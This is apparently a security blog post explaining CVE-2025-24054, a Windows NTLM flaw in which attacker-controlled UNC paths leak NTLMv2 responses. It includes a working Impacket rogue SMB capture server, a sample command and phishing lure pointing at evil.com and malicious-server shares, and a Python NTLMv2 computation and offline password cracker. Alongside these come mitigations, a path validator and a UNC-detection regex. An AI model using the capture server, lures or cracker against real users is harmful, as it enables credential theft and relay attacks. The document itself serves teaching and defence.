In early 2025, security researchers identified a vulnerability affecting Windows systems that use NTLM authentication. The flaw, tracked as CVE-2025-24054, stems from external control of a file name or path that Windows hands to NTLM, and it can be chained into network spoofing attacks. In this post I'll break down what the vulnerability is, how it works with code snippets, the risk it brings, and how attackers exploit it. I'll also provide links to original sources.

What is CVE-2025-24054?

CVE-2025-24054 exists because Windows components that authenticate with NTLM act on file names or path parameters received from untrusted sources without validating them. An attacker who controls such a value can make the system process an SMB path or UNC location that resolves to an attacker-controlled server, and Windows will try to authenticate to that server on the victim's behalf.

In plain words: if a Windows app or service processes a file or path you control (like \\attacker.com\share\payload.txt), the victim's NTLM credentials are sent to the attacker's machine, letting the attacker relay that authentication to other systems or crack the captured NTLMv2 response offline to recover the password.

- External control: any untrusted party can supply the file name or path, not just a local user.
- Forced authentication: Windows automatically tries to authenticate to an attacker-controlled UNC path using the victim's credentials, with no prompt.
- Spoofing and credential theft: the captured NTLMv2 challenge-response can be relayed to other services that accept NTLM (an NTLM relay attack) or cracked offline. It cannot be used directly for pass-the-hash, since that requires the NT hash itself rather than a challenge-response.

Proof-of-Concept: Triggering the Vulnerability

Here's a simple Python proof-of-concept (PoC) script that demonstrates how an attacker captures NTLMv2 responses triggered by a UNC path, using a rogue SMB server built on Impacket's SMB server library (the same code behind Impacket's smbserver.py example).

# PoC attacker script using Impacket to capture NTLMv2 responses
from impacket import smbserver   # SimpleSMBServer lives in impacket.smbserver, not impacket.examples

if __name__ == "__main__":
    # listenAddress: the attacker-controlled interface that the victim's UNC path resolves to
    server = smbserver.SimpleSMBServer(listenAddress="...", listenPort=445)
    server.addShare("SHARE", "/tmp")
    server.setSMB2Support(True)                  # current Windows clients no longer negotiate SMB1
    server.setSMBChallenge("1122334455667788")   # fixed server challenge so captures feed straight into hashcat/john
    print("[*] SMB Server started on port 445, waiting for NTLM credentials...")
    server.start()                               # each authentication is logged as user::domain:challenge:NTProofStr:blob

1. Start this SMB server on your attacking machine. Impacket logs each incoming authentication in the user::domain:challenge:NTProofStr:blob form that hashcat (mode 5600) and John accept.

2. Trick the victim (through phishing, or by abusing an app or service that accepts a path) into opening or referencing a remote file, as in the examples that follow:

Exploit Example With a Malicious UNC Path

Suppose we have a vulnerable Windows service that lets a caller specify a configuration file via a path argument and passes that value straight to the file APIs. If an attacker sends this (or tricks a user into running it):

service.exe --config \\evil.com\share\config.xml

Windows resolves the UNC path, opens an SMB session to evil.com and, when the server requests NTLM, sends the NTLMv2 response of the account the service runs as. If the attacker's SMB server is listening (see the PoC above), that response is captured. A service running under a privileged domain account is the most valuable target.

Attackers can also embed these UNC paths in Microsoft Office documents, emails, or even instant messages:

Click this link to get your invoice:
\\malicious-server\docs\invoice.pdf

If the user clicks, Windows tries to open the share, negotiates NTLM with the attacker's server and sends the user's NTLMv2 response, all without a password prompt.
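To make concrete what the attacker's SMB server actually logs, and why that capture is worth stealing, here is an added example that is not part of the original post. It reproduces the client side of NTLMv2 as specified in MS-NLMP (NT hash = MD4 of the UTF-16LE password, NTLMv2 key = HMAC-MD5 over the upper-cased user name plus domain, NTProofStr = HMAC-MD5 over the server challenge and the client blob), formats the result the way capture tools report it, and then runs the offline wordlist attack a defender should assume will follow. The user name, domain, password, challenge, timestamp and wordlist are constructed for the demo; MD4 is implemented inline because OpenSSL 3 builds of Python often lack hashlib's md4.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is missing on many OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1: message words in order
            a, b, c, d = d, _rotl((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a, b, c, d = d, _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & MASK32, (B + b) & MASK32, (C + c) & MASK32, (D + d) & MASK32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """The NT hash Windows stores and pass-the-hash needs; it never leaves the victim in this attack."""
    return md4(password.encode("utf-16le"))


def ntlmv2_blob(client_challenge: bytes, timestamp: int, target: str) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): version, timestamp, client nonce, one AV_PAIR, terminator."""
    name = target.encode("utf-16le")
    av_pairs = struct.pack("<HH", 2, len(name)) + name + struct.pack("<HH", 0, 0)  # MsvAvNbDomainName, MsvAvEOL
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: what the client sends and what the rogue server captures."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """The line a rogue SMB server logs: user::domain:challenge:NTProofStr:blob (hashcat -m 5600 layout)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack on a captured line: recompute NTProofStr per candidate password and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample (not real data): a victim account, the password we pretend it has, the fixed
# server challenge capture tools commonly use, and a small wordlist for the offline attack.
USER, DOMAIN, PASSWORD = "jdoe", "CORP", "Summer2025!"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = ntlmv2_blob(bytes.fromhex("0f1e2d3c4b5a6978"), 133_875_000_000_000_000, "CORP")
CAPTURED = capture_line(USER, DOMAIN, PASSWORD, SERVER_CHALLENGE, BLOB)
WORDLIST = ["Password1", "Welcome1", "Summer2025!", "letmein"]

if __name__ == "__main__":
    print("[*] captured:", CAPTURED)
    print("[*] cracked :", crack_ntlmv2(CAPTURED, WORDLIST))
```

The point of the round trip: the server challenge and blob are sent in the clear, so the only unknown in NTProofStr is the NT hash, and two HMAC-MD5 calls per guess is cheap enough that weak domain passwords fall quickly; an attacker who cannot crack it can still relay the live exchange to a service that does not enforce signing.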

Mitigations

- Disable NTLM in environments where possible (official Microsoft guidance), or at least audit its use and restrict it.
- Apply the latest Windows security patches.
- Harden SMB: restrict outbound SMB (TCP 445) at the firewall so Windows hosts can't connect to untrusted or external servers, and enable SMB signing and Extended Protection for Authentication on internal services so a captured authentication can't be relayed to them. Blocking 445 at the perimeter stops the Internet-facing version of the attack; an attacker who already has a foothold can still host the rogue share inside the network.
- Sanitize user input: if your app reads or writes files, validate that only expected, local names and paths are allowed. Reject anything beginning with \\ or //, anything with a drive letter or colon, and anything that escapes the intended directory after normalization.
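As an added example (not code from the original post), here is what the "sanitize user input" advice looks like in practice, together with a check for the phishing vector shown earlier: a validator that the hypothetical service from the exploit section could apply to its --config argument before touching the file system, rejecting UNC, long-UNC, device and file:// paths as well as drive-absolute, rooted and ..\ traversal paths, and a regular expression that finds UNC-style references in untrusted text such as email bodies. It uses ntpath so it runs on any OS; the base directory, candidate paths and sample message are constructed for the demo.

```python
import ntpath
import re
from typing import List, Tuple

# Anything that starts with two separators is a UNC path (\\host\share), a long-UNC path
# (\\?\UNC\host\share) or a device path (\\.\...); all of them can make Windows open an
# outbound session and authenticate with NTLM.
UNC_OR_DEVICE_PREFIX = re.compile(r"^[\\/]{2}")

# Hypothetical directory the service is meant to read its configuration from.
BASE_DIR = r"C:\ProgramData\svc"


class UnsafePathError(ValueError):
    pass


def resolve_config_path(base_dir: str, user_supplied: str) -> str:
    """Return base_dir\\user_supplied (Windows semantics) or raise if the value could leave base_dir."""
    if not user_supplied or "\x00" in user_supplied:
        raise UnsafePathError("empty or NUL-containing path")
    if UNC_OR_DEVICE_PREFIX.match(user_supplied):
        raise UnsafePathError("UNC or device path rejected: " + user_supplied)
    drive, tail = ntpath.splitdrive(user_supplied)
    if drive or tail[:1] in ("\\", "/"):
        raise UnsafePathError("absolute or rooted path rejected: " + user_supplied)
    if ":" in user_supplied:  # drive-relative (C:foo), alternate data stream (foo:bar) or file://host/... URL
        raise UnsafePathError("colon in path rejected: " + user_supplied)
    base = ntpath.normpath(base_dir)
    full = ntpath.normpath(ntpath.join(base, user_supplied))
    if ntpath.commonpath([base, full]) != base:  # catches ..\ traversal after normalisation
        raise UnsafePathError("path escapes base directory: " + user_supplied)
    return full


def is_safe_config_path(base_dir: str, user_supplied: str) -> bool:
    try:
        resolve_config_path(base_dir, user_supplied)
        return True
    except UnsafePathError:
        return False


# UNC references as Windows interprets them inside documents, mails and chat messages:
# \\host\share, \\?\UNC\host\share, //host/share and file://host/share. The lookbehind keeps
# the // of https:// from matching.
UNC_REF = re.compile(
    r"(?:\\\\(?:\?\\UNC\\)?|(?<![\w:])//|file://)"  # UNC / long-UNC / slash-UNC / file URL prefix
    r"([A-Za-z0-9][A-Za-z0-9.\-]*)"                 # host name or IP address
    r"[\\/]([^\\/\s\"'<>]+)",                       # share name
    re.IGNORECASE,
)


def find_unc_references(text: str) -> List[Tuple[str, str]]:
    """Return (host, share) for every UNC-style reference in untrusted text, in order of appearance."""
    return [(m.group(1), m.group(2)) for m in UNC_REF.finditer(text)]


# Constructed sample message for the scanner; the hosts and paths are invented.
SAMPLE_MESSAGE = r"""Hi Jane,
Click this link to get your invoice: \\malicious-server\docs\invoice.pdf
Backup copy: file://10.0.0.5/share/invoice.pdf
Portal (fine, HTTPS): https://intranet.example.com/docs/invoice.pdf
Long-path form: \\?\UNC\evil.com\c$\invoice.pdf
"""

if __name__ == "__main__":
    for candidate in ("config.xml", r"\\evil.com\share\config.xml", r"..\..\Windows\win.ini"):
        print(f"{candidate!r:40} -> {'ok' if is_safe_config_path(BASE_DIR, candidate) else 'REJECTED'}")
    for host, share in find_unc_references(SAMPLE_MESSAGE):
        print(f"UNC reference to host={host} share={share}")
```

The validator is deliberately an allow-list: it only ever returns a path that normalizes to something under the base directory, so a new bypass spelling (a different prefix, a URL form, a traversal trick) fails closed rather than needing a new deny rule. The scanner is the complementary detective control for mail gateways or document inspection, where a UNC reference in an inbound message is itself the indicator.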

References

- Microsoft Security Advisory - CVE-2025-24054
- Impacket SMB Capture Example
- Mitigating NTLM Relay Attacks
- UNC Path Attacks and Windows Security

Final Thoughts

CVE-2025-24054 demonstrates how a single externally controlled path or file parameter can expose an entire Windows network to spoofing attacks. Attackers only need Windows to ask for a file on their server and, unless protections are in place, they collect an NTLMv2 response they can relay or crack.

Always keep your system updated, review your code for unsafe path handling, and restrict outbound SMB communications wherever possible.


Stay safe! If you like these deep dives, follow this blog for more exclusive CVE breakdowns and practical security guidance.

Timeline

Published on: 03/11/2025 17:16:27 UTC
Last modified on: 04/03/2025 21:15:21 UTC